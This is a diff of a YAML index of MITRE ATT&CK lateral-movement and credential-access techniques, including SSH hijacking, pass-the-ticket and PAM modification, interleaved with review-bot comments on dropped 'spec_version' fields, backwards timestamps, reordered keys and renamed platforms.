+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
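Review bot: the deletion of `spec_version: '2.1'` beside `object_marking_refs` in this hunk is the first of a long series of identical deletions in this file, with `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` taking its place. `spec_version` is a required property on STIX 2.1 objects, so the commit message should state plainly that the index is no longer meant to be STIX-conformant (or that the new upstream source omits the field), and the generator and any consumer in the repo should be grepped for `spec_version` before merge. Minor, in the new VNC references: `T. Richardson, J. Levine, RealVNC Ltd..` carries a doubled period that comes from the upstream description; fix it upstream rather than by hand here, or the next regeneration will reintroduce it.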
@@ -41547,11 +42235,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -41574,9 +42262,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -41627,7 +42314,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -41691,7 +42377,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -41762,7 +42447,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -41799,7 +42483,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
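Review bot: `modified` for T1563.001 moves backwards in this hunk, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-23T23:11:24.682Z'`. A refresh from the current upstream bundle should never make an object older, so either the previous index was generated from a different bundle or this regeneration picked up a stale copy of the technique; confirm which bundle version was used before merging, since the same regression appears for T1210 further down.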
@@ -41830,8 +42514,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
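Review bot: for T1563.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted after `x_mitre_system_requirements` and no `x_mitre_attack_spec_version` is added anywhere else in the object, unlike the other techniques in this diff, which end up at 3.2.0. If this object is being carried over unchanged from an older bundle the field should be retained rather than dropped; otherwise any code that reads `x_mitre_attack_spec_version` has to tolerate its absence for this entry.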
@@ -41914,12 +42596,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -41946,6 +42627,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -41963,12 +42645,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
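Review bot: the platform list for T1550 gains `- Identity Provider` although nothing identity-related is removed from it in this hunk, so this is a widening of the technique's scope and not only the `Office 365` / `Google Workspace` to `Office Suite` rename seen elsewhere in the diff; it deserves a line in the commit message. More generally, any per-platform index this repo derives from `x_mitre_platforms` needs regenerating now that `Office 365`, `Google Workspace` and `Azure AD` no longer appear as platform names, and an index file named after a retired platform will otherwise go stale.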
@@ -41994,14 +42676,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -42119,7 +42800,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -42173,11 +42853,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42229,14 +42908,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42322,12 +43000,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42347,6 +43024,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42354,7 +43032,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42370,39 +43047,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
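Review bot: the `external_references` list for T1550.003 is reordered rather than changed: `CERT-EU Golden Ticket Protection` moves from last to first and `GentilKiwi Pass the Ticket` / `ADSecurity AD Kerberos Attacks` swap places, which turns the only substantive edit (the GentilKiwi `url` now pointing at a web.archive.org snapshot, with its retrieved date updated) into a hunk of some forty lines; `x_mitre_modified_by_ref`, deleted in the preceding hunk, is likewise just re-added here at the bottom of the object. If the generator does not control list order, sorting references by `source_name` before dumping would keep future refreshes reviewable.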
@@ -42427,12 +43105,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42446,13 +43123,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42469,7 +43145,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42517,7 +43193,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42550,7 +43226,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42589,7 +43264,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
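Review bot: `modified` for T1210 regresses from `'2022-05-11T14:00:00.188Z'` to `'2022-02-24T15:06:46.006Z'`, the second backwards timestamp in this diff (T1563.001 is the other). A refresh from the current upstream bundle cannot yield an older `modified`, so verify which bundle this entry was generated from before merging.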
@@ -42623,12 +43298,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
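Review bot: as with T1563.001, T1210 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` after `x_mitre_is_subtechnique: false` and receives no replacement `x_mitre_attack_spec_version`, while every other technique touched by this diff ends up at 3.2.0. Either keep the 2.1.0 value for objects that were not re-exported, or document that the field is optional and make consumers treat it that way.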
@@ -42656,10 +43329,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -42689,7 +43361,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -42751,12 +43422,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42780,11 +43450,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -42809,9 +43478,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -42871,7 +43539,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -42926,7 +43593,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -42994,12 +43660,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -43056,6 +43721,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43066,13 +43732,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -43131,7 +43796,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43225,49 +43889,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43282,20 +43907,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
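Review bot: T1556.003 is effectively rewritten by this hunk and the one before it because the key order changed: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted from the top of the object and re-added at the bottom with the same values (with `PAM Creds` additionally moved ahead of `Red Hat PAM`), so the real changes (`modified`, `x_mitre_version: '2.1'`, `revoked: false`, `x_mitre_deprecated: false`, `x_mitre_attack_spec_version: 3.2.0`) are buried under dozens of lines of moves. Dumping with a fixed key order would keep future refreshes reviewable. Also note that `x_mitre_permissions_required:` / `- root` is dropped here and not re-added, which is a content change for anything that filters techniques by the privilege they require.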
@@ -43375,12 +44037,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43409,6 +44070,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -43420,18 +44082,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43458,14 +44120,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
